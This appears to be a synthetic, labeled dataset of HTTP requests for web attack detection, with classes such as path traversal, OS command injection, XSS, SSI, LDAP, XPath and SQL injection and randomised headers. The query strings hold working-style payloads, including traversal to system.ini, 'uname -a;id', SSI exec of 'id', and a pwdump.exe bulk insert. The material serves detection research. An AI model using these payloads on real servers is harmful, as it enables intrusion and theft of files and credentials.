If-Match: "pJWCQLGmE@_WmGIl04XQ"
If-None-Match: *
If-Range: Wed, 09 Mar 05 01:24:02 UTC
Max-Forwards: 7222
MIME-Version: 7.0
Pragma: cyr=omapefe
Proxy-Authorization: Digest realm
Authorization: Basic bjh0MHZkNzpzT1Vu
Range: 80-3804,023297-91,09-
Referer: /iqzdsn/6Tom.bin
TE: trailers
Trailer: Range
User-Agent: ij5ysam (ycY9Tg; aWv@x0RL5)
UA-CPU: MIPS
UA-Disp: 3899,512,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1285x9347
Via: HTTP/0.1 www.xang.gif, iay/2.4 160.19.139.125:6
Transfer-Encoding: identity
Upgrade: teh/9.0, ittnn/5.6, ohtcp/8.9
Warning: 210 www.mTetdThm.shtml "LTt1suesam" "Fri, 22 Feb 08 23:40:02 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42127
Start - Id: 45825
class: PathTransversal
GET /ioatizalutbbcedc/e7xmGQAABY.F_R@OAujG/xGLtX7M5UxNuinputKb/ofsMoawlerflPa/AL/tNbi7qtmiEaOers/aF67jZp5/ehFNguRP5QXP2FV/pum@X6@4@Z/tg.cfm?ernCeoami=atsrh&0uiqOme0isp1zii=sZQW0XykW&leit=mftpi&RM0NpBn1-includeFusr=6021346&nIreactrt=88&notnnomtesP=EstdtflEa3yt8&rr=s%27aRt5&scjqisezc=5770453&ekKfT56bsUT=..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&NnigeTbe=h1ogclbS5eE&aFDtetcj2T=nullsstasi&F1zSVeNoOv=eSN3R&1pesfneamd=641355050&th=tcfs HTTP/1.1
Host: 212.211.175.217
Connection: frAlntiD
Accept: text/plain, image/gif
Accept-Charset: x-mac-chinesetrad, cp-932, x-mac-korean;q=0.9, windows-1251;q=0.0, hz-gb-2312
Accept-Encoding: compress;q=0.8, compress, identity;q=0.2, gzip, deflate
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 106.190.4.232
Cookie: nrpctDl=eHMKYl2Mn;FephLwes=u@ gvrdacceptu;ioj=s3ipcaselecttmr8rt;znt6n=0-DJUS-Ra
Cookie2: $Version="357"
Date: Wed, 20 Dec 06 21:18:12 UTC
ETag: W/"0Tmw.hj-HlQDAFpQyyGj"
Expect: tons32
If-Modified-Since: Sun, 28 May 06 20:36:37 UTC
If-Unmodified-Since: Sat, 06 Mar 04 08:55:29 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 04 Apr 05 08:34:55 CET
Max-Forwards: 402
MIME-Version: 9.7
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: NTLM eHNuc2VtaWFyYXlpZG5hZGYxZVdOb2NtZXNvZnNzb2tubXdz
Range: 09236-
Referer: /hWteeeon/rhdensr/bgSAsie/ltwngaia/ThcaeOdd.zip
TE: chunked,deflate;q=0.0,trailers
User-Agent: Mozilla/3.4 (X11; U; SunOS sun4u 3.6; wn-2i; rv:7.5.5) Gecko/20786761
UA-Pixels: 1524x385
Via: ee7haM/9.0 www.tbog.png, 1.7 www.e0orOtoR.tiff
Transfer-Encoding: deflate
Upgrade: oeqAi/2.8, azod/4.0
X-Serial-Number: 25397478987579

null

End - Id: 45825
Start - Id: 43578
class: OsCommanding
GET /aeo3tno7hnO9vlamtz/hetrh.dll?6nnthna=eZq&gtcwn2c09mexc=eE2lsre7&XH4GXWkN=te9ee&eynoya06=tcfeoftpetvl5e&nhajm=sedcktpeoae&euqulyxeAt4t=%3Becho+%3B++w+++++%3B+uname++-a%3Bid&OhV1w=nam&dAoiA=45654958&ZG5x=6172&bos0hn=5114&rihorsx=5412412464 HTTP/1.1
Host: 250.33.215.100
Connection: close
Accept: */*;q=0.6
Accept-Charset: koi8-r, iso-8859-15;q=0.4, iso-8859-8-i, x-mac-roman;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=08794
Client-ip: 147.121.23.77
Cookie: eskomttweuhI=uC4BsjW;pezuretB0=rAs httpshg6  PslrbQ%
Cookie2: $Version="7"
Date: Thu, 26 May 05 04:43:42 GMT
ETag: "z@VDwv-LBAonIc6"
Expect: oCdgAeg=huco
From: uiaeltm@8ehtblt.biz
If-Modified-Since: Thu, 07 Apr 05 06:47:20 UTC
If-Unmodified-Since: Mon, 01 May 06 19:54:17 UTC
If-Match: *
If-None-Match: *
If-Range: "wFGwu6f1XA-FIRqrK9c"
Max-Forwards: 036
MIME-Version: 0.2
Pragma: gn5dym=wVmenor
Proxy-Authorization: Basic Mm9zZXNlbzphc3dkaGVq
Authorization: Digest qop=auth-int
Range: 08647-744
Referer: http://4heu.be/jcasctti/e1seao/amrdmt.cfm
TE: trailers
Trailer: Host
User-Agent: twsmuo5et/2.9.6.1.6
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 1267x2165
Via: 9.2 39.145.134.161
Transfer-Encoding: gzip
X-Forwarded-For: 171.91.103.182
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43578
Start - Id: 45444
class: PathTransversal
GET /pW6tZIMT@V.dll?gtieicnnAmsNr=824&oo18ohnmlr=tnZz1v&ocueorYoslleSsi=7s2tebri9trbHu7ol&16hdst1ddt9=laNginhuaeaevyekap&ue=..........................WINNTsystem.ini&HrI=n%3CHans7+l5ters%40&l0=311&udo=ef0ycutZeHlrC3n&en9I13=795327929&ye2Mz=39214&twyrhL=nhi&etsa9e=IsuNacsu3ihos HTTP/1.1
Host: 41.132.68.116:98
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: erAmG-fb, R4tn-egk
Cache-Control: no-cache
Cookie2: $Version="76"
Date: Thu, 05 Apr 07 07:39:35 CET
If-Modified-Since: Sun, 16 May 04 05:32:34 GMT
If-Match: *
If-None-Match: "8_ctXRlnCKINx16eiKrq"
If-Range: Tue, 22 Jun 04 15:48:05 CET
Max-Forwards: 4
Pragma: no-cache
Authorization: ol8si b5aft=hhohnl
Referer: http://www.l3ed7ems.it/oiit/TaqtemNs/oubefS/nmrE.jpeg
TE: deflate
User-Agent: tawgEe/6.7
Via: etha6/3.0 238.84.73.164, pgohn/4.6 www.evawdcnw.tiff
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9

null

End - Id: 45444
Start - Id: 45688
class: PathTransversal
GET /tauQij/qdyUyyCx4/DQICv6J/0V/KdWTazavLyf/8yRvKnFmvpAkK@Jvo39/muFuyc3nRarnepRrS3ne.asp?ly=706764&wYwnozy7otnan=..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&rSseE0trftfd=tnNet7 HTTP/1.1
Host: www.raxUd.net
Connection: close
Accept: text/xml;q=0.1, image/png, video/*;q=0.0
Accept-Charset: iso-2022-kr;q=0.4, windows-1254;q=0.7, cp-936;q=0.8, euc-jp;q=0.0, windows-1254;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 10.24.0.201
Cookie: tv=8l;selectorNF8=C6n;UJU4G9EuW5H=osrcninnn;dmy7ag5Xuo5tejP=78395511
Cookie2: $Version="55"
Date: Tue, 10 Jul 07 04:46:29 CET
ETag: "te5LXUt5O3OOLfUO"
Expect: to4thr
From: esIpsioy@eehlxsang.it
If-Modified-Since: Fri, 16 Sep 05 12:06:39 UTC
If-Unmodified-Since: Tue, 18 Jul 06 02:20:19 CET
If-Match: "OdEyfn9cObmoLLWhM3A"
If-None-Match: *
If-Range: Sat, 18 Jul 09 14:32:22 UTC
Max-Forwards: 769
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nc=dFd20C70
Authorization: Basic cmVnR3Jlbm46c21hYWs=
Range: -934,-807,-703421
Referer: http://www.soah.gov/Oxer/ym6ta/oo0TGy9/i8os.jpeg
TE: gzip;q=0.3,deflate,chunked;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/2.6 (X11; U; Unix 9.4; og-1i; rv:8.0.3) Gecko/80999824
UA-CPU: StrongARM
UA-Disp: 3926,182,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 488x430
Via: niIeeI/2.7 www.msnere.css, 1.6 249.252.148.198
Transfer-Encoding: compress
Upgrade: Weyge/4.5, 12qen/6.1, nL6/9.1, 0dpMle/5.5, aosm8/0.7
Warning: 416 www.s8no.css "erg5ewnaswmt7ceb" "Wed, 30 Jan 08 22:16:24 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45688
Start - Id: 44946
class: PathTransversal
GET /oedgeajftnyrAod/bC/2tLB_sAQY87/aTF/gfoobahkmtmneN/tfnseretDyb/svdxph/S4GDCcMg/oDyUqZmIG_0TpX9e.jpeg?rfwgpIoet=file%3A%2F%2F%2Fi%3A%2Fnede%2Flan%2Fmntsee.xml&ibs8g6e=tRtrh2n&dnr4A=riKGXyWn-&zlsilefxnesegs=Dntnd5eejzndiwlst&letuhlzet=%29csj&R0a1F=54655&w1oee1szsenk=51235&eaDg=tedgt&6Gmeta@Bj_N=64549&HsamAC7=683862&7okjmm1ees9ri=2opttopxCailue3%28aglS&ja7xFfK=90186359&akdoslnlrepi2ee=33&lEWbbRmt=gBi HTTP/1.1
Host: 136.69.150.135:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: compress, compress, identity, deflate, gzip
Accept-Language: tDndct-aCtriw, nr5r-eltndUa, gkox-xlerrtbs, mpfsghaA-omnxfoi, eO-e3;q=0.2
Cache-Control: no-transform
Client-ip: 199.211.182.175
Cookie: ntmf19yfmeesHwr=fsKq;-BWiKQ0r9='t5igt;aeeoesl=:yg@oitrte;Eth5li=5
Cookie2: $Version="755"
Date: Sun, 23 Jul 06 18:35:47 CET
ETag: "W49aMqjgivLkT-_5"
Expect: 100-continue
From: idto@ug5qpuenx6.org
If-Modified-Since: Tue, 20 Apr 04 21:12:06 CET
If-Unmodified-Since: Tue, 15 May 07 22:12:25 GMT
If-Match: *
If-None-Match: "BFtn4Svcv8_UsgxCcZ0M"
If-Range: *
Max-Forwards: 2
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest response="cFbf2F57cDDF4E7Ed19bE92BCEa0ec12"
Authorization: Digest username="ey7caC"
Range: 032407-30
Referer: http://1jhita.org/cao0u/nuNnil/ldnb/tdn3ec/6nsp.mpg
TE: deflate
Trailer: Referer
User-Agent: Mozilla/6.4 (Windows; U; Windows NT 7.3; ad-eD; rv:3.5.7) Gecko/86647442
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2762x370
Via: rtebe/4.4 www.1aVni3fo.gif, FTP/6.2 232.165.196.230, 1.0 66.198.47.156
Transfer-Encoding: nrCkY4
Upgrade: sSAynh/2.0, tnEo/3.3, jo1wa/2.9
Warning: 151 7.22.89.225 "tqonsaseaLehs" "Fri, 02 Feb 07 23:07:17 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44946
Start - Id: 45613
class: PathTransversal
GET /hS/oomlt/iYwxVsN/telslfaeplS/itluehci.js?euHdmt=uO%3Dscript+imgnrs&8selectvar6httpFxTJ5=%3EeCucetwtepgD&ve7xwrr=Ii&8bsSdPe=2xp_ne-altdie8dord3ct&LLrU5O=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&IrurShtnof=%7E%3Bea HTTP/1.1
Host: 181.149.202.89
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, compress, gzip, gzip;q=0.0, identity
Accept-Language: *
Cache-Control: max-age=05
Client-ip: 54.187.183.145
Cookie: Hnteosrr15tit=eUeGe-;E4JM3ZchildXOX=Brz1ei47m7;1DhPm9c.fl=oMW;en1=aornda0sni;eshtTv=lh1
Cookie2: $Version="46"
Date: Thu, 12 Nov 09 14:30:10 CET
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: uoee@mhingdoAj.uk
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Thu, 22 Sep 05 19:46:12 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 797
MIME-Version: 4.5
Pragma: wia='eLi8'
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Basic MnJzZW9zcjpOZW4yZWQ=
Range: 942-,71595-5
Referer: /llaa.dll
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: a5TJmXbqp http://www.y7et.biz
UA-CPU: x86
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: 9.5 214.159.68.124, 0wuae/8.9 www.feldc.js
Transfer-Encoding: eiSs
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45613
Start - Id: 45273
class: PathTransversal
GET /hP0/cEmcmoEqrkettmMn0/tS0qcXV8LAfo.aspx?nju65lSaejS=eigltercpselectuO6dleZnofae&os=d+Ttn5u&tdatvjltCsuetm=hjhEV_sEbY&SGC@=Efhdtiepojo&8lhrcmBomartsns=30287072&enrwhv9ioo8idnn=gqIo73s%40&AF0o3=htdiaea&X.log26Zw=axsCZ91&ai4imi=efmRnNno&eo=Frr6rss3esdjt HTTP/1.0
Host: 44.197.43.133
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, compress;q=0.4, gzip;q=0.5, gzip;q=0.3
Accept-Language: ..\..\..\..\..\..\..\..\..\WINNT\system.ini
Cache-Control: no-store
Client-ip: 166.169.134.169
Cookie: nehaTroci=oesoioettrpEehr;e9G=elcne81iupdate7cieol
Cookie2: $Version="48"
Date: Fri, 15 May 09 21:29:55 UTC
ETag: W/"GdPyX5kqoNwtgLKVl"
Expect: elrv
From: ra7rtweh@ttrsy.org
If-Modified-Since: Thu, 05 Jul 07 01:45:21 CET
If-Unmodified-Since: Fri, 23 Oct 09 17:59:18 GMT
If-Match: "bBzfHYPro9Fw4_gcUf8"
If-None-Match: "oZNWlsDLnLtvcnDXT4"
If-Range: Wed, 22 Jun 05 20:23:20 UTC
Max-Forwards: 6091
MIME-Version: 1.0
Pragma: sregyksx=f2fp
Proxy-Authorization: Basic enRvTzphaXFu
Authorization: NTLM ZTRNMjluZWR0QmFCb09yMDVybzNkZ0RudGUzdGViZW90ZEVldWx5YzZtZHc=
Range: 259-814,-6312
Referer: http://www.mmqgolrs.st/deme/yau69/eoxstaj/ke3ro.msf
TE: trailers,chunked,deflate;q=0.1
User-Agent: Mozilla/1.9 (X11; U; Linux i586 2.2; nl-oy; rv:0.3.3) Gecko/22877994
UA-CPU: 68000
UA-Disp: 4571,953,16
UA-Pixels: 351x9114
Via: tLhuar/8.7 136.140.199.80:73
Transfer-Encoding: ebhIt3; siDelcnc=oXot
Upgrade: zdyi/5.6
----: ------------------

null

End - Id: 45273
Start - Id: 47577
class: XSS
GET /autoexec@Fb/mJUdIDCqk@6LYy/oitplorixswlEnewmIo/@oretJuRs.msf?aoe=exxJwuz-l&iftqnaohEetdb=eeterzeaanodlrwms6&a6=haSuoN&aTFaei=48436570&sw9ib=433&frfR9=%26%3Cscript+++%3E%5Balert++%28%27re8hosls%27%29%3B%5D%3C%2Fscript+++%3E HTTP/1.1
Host: 153.87.123.172
Connection: s3otha
Accept: */*;q=0.6
Accept-Charset: euc-kr;q=0.7, windows-1253;q=0.4, iso-8859-6, x-mac-arabic, x-mac-roman;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 118.106.166.150
Cookie: retr9cisngsat=zeEc;tn3dStnhhl=38378287;en4IRnmulm=cWnqavilfiai8rrL;hgt=~yadming3inserthhtotnsiD
Cookie2: $Version="655"
Date: Mon, 25 Feb 08 02:11:02 UTC
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: ih1treV=Hro8bc;fphyedn=8usRht
From: we7o1cGs@2OwoTmtOk.com
If-Modified-Since: Sun, 20 Feb 05 12:55:03 UTC
If-Unmodified-Since: Fri, 16 Jan 09 14:14:54 GMT
If-Match: "s7b7MVjb72gaeV.54hD"
If-None-Match: *
If-Range: *
Max-Forwards: 604
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic dHJ4ZTg4OmlvRnM=
Authorization: NTLM c0N0OXk2dGlnYTZtZEVuRVRob3plNXZlaXNsTGlneGdhd3hoZXZt
Range: 7-,-18566
Referer: /ietsn/aoogcio/neUiMvg8.sh
TE: chunked;q=0.0,chunked,trailers
Trailer: If-Match
User-Agent: Mozilla/6.8 (Machintosh; U; PPC 9.7; Tr-ee; rv:5.0.3) Gecko/84818343
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: 9idere/1.6 190.7.161.71:54757, FTP/9.9 34.35.147.201, FTP/3.7 218.153.178.54
Transfer-Encoding: eenbH; ysete=etomFen
Upgrade: eTere/4.3, ulLei/2.8
Warning: 205 168.163.244.39 "rui0nun" "Thu, 26 Jan 06 03:08:13 CET"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47577
Start - Id: 40171
class: SSI
GET /2nAj7QfUk@4Yzs/sAfC/inPgl2nn46/oZlxNLgdtu/aetotorht/rd8NwfgENfy1/aQrX/iNjKeSDVo3@vi/e4ow/sL4mseNaonAvwlrd3.mspx?katonLdtt3o0ew=igghrs42rrelosn&cmhrr8nngasnas=Gtercst&servicesgRylkWFA1Yl=%3C%21+++%23%3C%21--+++%23exec++++cmd%3D%22id%22--%3E HTTP/1.0
Host: 1.73.16.166
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: euc-jp, x-mac-chinesesimp, iso-8859-1;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: lNueo18-nemu;q=0.3, echANHYd-askr
Cache-Control: no-cache
Client-ip: 34.79.0.86
Cookie: VIItzQJqgroup byphplT=s.K.R;max=ft;lku1=m+ae;n5it4cgimtb=569
Cookie2: $Version="360"
Date: Sat, 26 Feb 05 24:16:07 GMT
ETag: W/"k_aCPWy5XqeILlOdj5S"
Expect: GH1D
From: min0e4tn@ehtETuft.cz
If-Modified-Since: Mon, 21 Aug 06 19:18:03 UTC
If-Unmodified-Since: Sun, 26 Aug 07 08:12:42 GMT
If-Match: *
If-None-Match: "1X-LJfWF9XstIzg0jdi"
If-Range: "HTNL@6GVcVQJORIa"
Max-Forwards: 5190
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic cGNuY3Njczplbm9ybTQ=
Authorization: tsnral ysei=dtieashn
Range: 85-
Referer: /elhoor/RlL4.gif
TE: trailers
Trailer: Warning
User-Agent: tZ0FSW5mg http://www.thtpdru.ch
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 427x7361
Via: znepIk/0.4 www.ishtw0A.css:01
Transfer-Encoding: a4ge; thpeg=5untis6n
Upgrade: jil/6.4, nmatei/2.7, 8mb/9.3, iejhA/3.6
Warning: 617 www.aa0efg.png "i7eeeyweupihp0u" 
X-Forwarded-For: 237.110.243.93
X-Serial-Number: 06191135820
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40171
Start - Id: 38427
class: LdapInjection
GET /ncT2i8bIma/awxuEZqpWJBl5SQ/ytesna/omOpYAuXh/dDETPk/n1JmwjmlT6N5bG2eOaT/nuocouyemt8deIt/Myz2P0/0tag6prEal/i5-YcKgV6F_y78r9t8j/styledelete9c.exe?bEOMetumetah=etto%29%28%26%28objectClass++%3D++put*%29 HTTP/1.0
Host: 126.79.31.119
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.3, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 174.114.246.188
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="8"
Date: Fri, 27 May 05 09:50:07 CET
ETag: "caysJ7Ou24aNUTvQ"
Expect: 100-continue
From: rdilvt@ritcafh.net
If-Modified-Since: Fri, 31 Jul 09 23:37:31 CET
If-Unmodified-Since: Tue, 28 Sep 04 24:07:01 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Apr 10 14:20:55 GMT
Max-Forwards: 5
MIME-Version: 2.2
Pragma: s='ecco'
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: Digest nc=44BdCDBb
Range: -03,38-
Referer: http://www.c0oqeb.biz/xahmjuoa/aisoeThE/tnum8/eenenw.ace
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.2 (compatible; MSIE 9.8; Windows NT; e7vute; neeFuioes; rdDri9ae)
UA-CPU: x86
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: soon/5.4 64.89.237.87
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38427
Start - Id: 39711
class: SSI
GET /t95KFxrPTLU.jpeg?uneuswi=%3C%21--++%23include++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&aem1eleiSi=5&oqelei=43085901&moesig8fnzi1ei=cre HTTP/1.0
Host: www.eh5h4vp.gov
Connection: close
Accept: */*;q=0.4
Accept-Charset: euc-cn;q=0.8, euc-tw, windows-1251, ks_c_5601-1987, x-mac-roman;q=0.4
Accept-Encoding: compress;q=0.0
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 90.61.188.169
Cookie: aTemenhlf5s=559;tue00tfc7a=oammLD-B7hN_;b0hiw=sLj;ini=ici4oSnaei
Cookie2: $Version="1"
Date: Sat, 22 Dec 07 05:43:38 CET
ETag: "eQt1lpFUkKACMULNX9"
Expect: 100-continue
From: en976nr@rtqaia.net
If-Modified-Since: Tue, 04 Jul 06 24:59:06 UTC
If-Unmodified-Since: Mon, 08 Aug 05 18:37:10 UTC
If-Match: "T9yLUIs4qRNry4USc2"
If-None-Match: *
If-Range: Sun, 29 Jan 06 07:21:27 GMT
Max-Forwards: 15
MIME-Version: 1.4
Pragma: detqeL=scetpb1g
Proxy-Authorization: mE1df gdtrmo=oh1esyls
Authorization: NTLM Z2MzdHNVcnU0bzVoc0RlZWlvVXdldmFYSXNscWxtZXJpcnVy
Range: 61-,98874-5,222224-
Referer: http://direi.gov/yoilo/urea/surh/0aoisnv.php4
TE: deflate;q=0.3,deflate
Trailer: From
User-Agent: ejetvrihhe/7.1.6
UA-CPU: Sparc
UA-Disp: 3264,053,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 893x558
Via: 3.9 www.mRoyNro.js:118, FTP/6.6 238.248.77.247
Transfer-Encoding: compress
Upgrade: effn/5.2, ajnt/0.1
Warning: 414 39.123.241.242 "diuAtlysh" "Sat, 05 May 07 01:06:17 GMT"
X-Forwarded-For: 227.157.179.153
X-Serial-Number: 9911764547155
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39711
Start - Id: 44379
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: 141.225.39.25
Connection: knue
Accept: */*;q=0.5
Accept-Charset: euc-kr;q=0.1, euc-jp, iso-10646-ucs-2;q=0.9, utf-8;q=0.3, iso-8859-3;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=388
Client-ip: 90.164.80.82
Cookie: X2ncYY=r 9elh ;trHxneed8rcdexd=shyduc8;sNevcNoc=226157693;stahhedmenlest=ek;sDaDe=]E
Cookie2: $Version="962"
Date: Fri, 25 Mar 05 23:54:24 CET
ETag: "hRtyES0J8kvkJHkX"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Wed, 10 May 06 04:09:41 CET
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: *
If-Range: "4SoVXSAvOO8jfGxd"
Max-Forwards: 95
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Basic YlJoZWlnOjN6aW5lR2I=
Range: -592489
Referer: /eeRre6ke.asp
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: 0evsWMJYTm http://www.soerd.org
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 347x4806
Via: FTP/7.8 221.252.209.249, 1.7 www.ien9hpl.html:6316, 0.0 236.202.122.185:03
Transfer-Encoding: deflate
Upgrade: HeiarI/6.4, enio/6.7, DHqogf/0.4
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44379
Start - Id: 48594
class: XPathInjection
PUT /JmE0aoses/sZxH/FusrfreplaceAin906R/ncSt90Iy3MBgyVu/tp/c1SMLq.cgi? HTTP/1.0
Content-Length: 81
Content-Language: ea,cdf,8nR
Content-Encoding: deflate
Content-Location: /dnFirDnt/teempua/teuorvst/Aa7dlk9e/e6n2.zip
Content-MD5: bWttU2Vyb2d1bmllZzhlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Nov 05 14:24:58 UTC
Last-Modified: Sat, 31 Jan 04 03:49:45 GMT
Host: www.hsrE.com
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.2, x-mac-japanese, x-mac-korean;q=0.5, x-mac-hebrew;q=0.6
Accept-Encoding: compress, identity, identity;q=0.0, compress, gzip
Accept-Language: rdputet-ejoghv, enmihea-OuTsa;q=0.5, iospuail-dor4;q=0.8, iem-AcmutEs, a-mbca
Cache-Control: max-age=5122
Client-ip: 58.151.109.14
Cookie: noixRe4yyrs=00266712;tha9Utfed2m=3867;P0nwinntgQHUtDAv=atcyTioeahn 3d;ieo;Bnf9ehw=150;orav=samwb:mouus;acona=w
Cookie2: $Version="357"
Date: Sun, 18 Sep 05 09:30:52 UTC
ETag: "24798vzil9D39PB9"
Expect: 100-continue
From: ebiq@eeIse.it
If-Modified-Since: Thu, 19 Oct 06 21:37:03 CET
If-Unmodified-Since: Fri, 19 Oct 07 09:57:59 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Wed, 10 Dec 08 08:26:17 UTC
Max-Forwards: 41
MIME-Version: 0.0
Pragma: mrq='o'
Proxy-Authorization: Basic eG9IaTZ0ZGc6ZWZOcmg=
Authorization: Basic bGUxdDpudXpTZnE=
Range: 39-76,5-4266
Referer: /siosh/stz9tE/zhmthgdm.dll
TE: deflate;q=0.7,gzip
Trailer: Authorization
User-Agent: Mozilla/9.1 (Machintosh; U; Mac OS X 8.2; h0-ah; rv:0.1.2) Gecko/19098480
UA-CPU: PowerPC
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: g37m/1.0 186.25.199.111, 8.6 www.4djtnxh.jpeg:9411, 4.8 www.i0orsjd.htm:2567
Transfer-Encoding: deflate
Upgrade: iroi/0.7, Osior/8.4, 9Ceim/4.8
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 41138293275827237103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

geascree=mH'] | P     |   //user[    name/text()  = 'hsix

End - Id: 48594
Start - Id: 41154
class: SqlInjection
GET /nV5cOcG@@9Z2-/Noie9yaaerirP1rIts6/Tqogtyi4tnol/hoqiolAiOnEohtkls.sh?Y02i=i1m&gaeIezR8d=2278&eds8htc5oeie=06469&adnemsch=o1JMR9SrU&sild4m5=iFHgU8hA2&RZcqE@cQtONp=ys+e%3D&rsir6sd0o=oIantahYq9&ohtts=bulk++insert+++++xaE9ldte+from++++%27pwdump.exe%27+++++with+++%28codepage%3D%27RAW%27++++%29 HTTP/1.0
Host: www.aemcihne.ch
Connection: keep-alive
Accept: text/plain;q=0.0
Accept-Charset: hz-gb-2312;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Cookie: t7=hr9b3;tynvaohei9gi= vdj;rirbgiewydEeTAx=73;UtYN=6urs;hsuidgte=z1Ohto
Cookie2: $Version="310"
Date: Wed, 07 Nov 07 14:14:48 GMT
ETag: "kySf-tR9OR..Mwo"
